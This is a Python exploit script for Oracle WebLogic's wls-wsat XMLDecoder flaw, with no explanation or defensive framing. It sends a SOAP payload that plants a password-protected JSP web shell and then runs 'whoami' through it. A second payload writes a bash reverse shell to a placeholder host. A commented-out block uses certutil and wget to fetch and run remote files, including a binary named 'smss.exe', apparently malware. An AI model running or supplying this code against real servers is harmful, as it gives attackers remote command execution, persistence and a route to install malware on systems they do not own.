import requests

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
    "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
    "Content-Type": "text/xml"
}


payload = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
    xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/demo.jsp</string>
    <void method="println"><string><![CDATA[<%   if("xk".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<xi4okv><pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    } %>]]></string></void><void method="close"/>
    </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
'''

payload_shell = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
    xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.sh</string>
    <void method="println"><string><![CDATA[bash -i >& /dev/tcp/xxx/xxx 0>&1]]></string></void><void method="close"/>
    </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
'''




def exp(target):
    url = 'http://' + target + '/wls-wsat/CoordinatorPortType11'
    resp = requests.post(url, data=payload, headers=headers, timeout=5)  # attack
    
    url = 'http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=whoami'
    resp = requests.get(url, timeout=5)
    if resp.status_code == 200 and "xi4okv" in resp.text:
        print ("\n" + url + "===>" + resp.text[0:20])
        
    
    
    '''
    if resp.status_code == 200:
        if "xi4okv" in resp.text:
            print "\n" + url + "===>" + resp.text[0:20]
            
            cmd = "certutil.exe -urlcache -split -f http://xxxx/smss.exe"
            run = "smss.exe"          
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + cmd, timeout=5)
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + run, timeout=5)
            
            cmd = "wget http://xxxxx/error.py"
            run = "python error.py"
            
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + cmd, timeout=5)
            requests.get('http://' + target + '/bea_wls_internal/demo.jsp?pwd=xk&i=' + run, timeout=5)
   '''


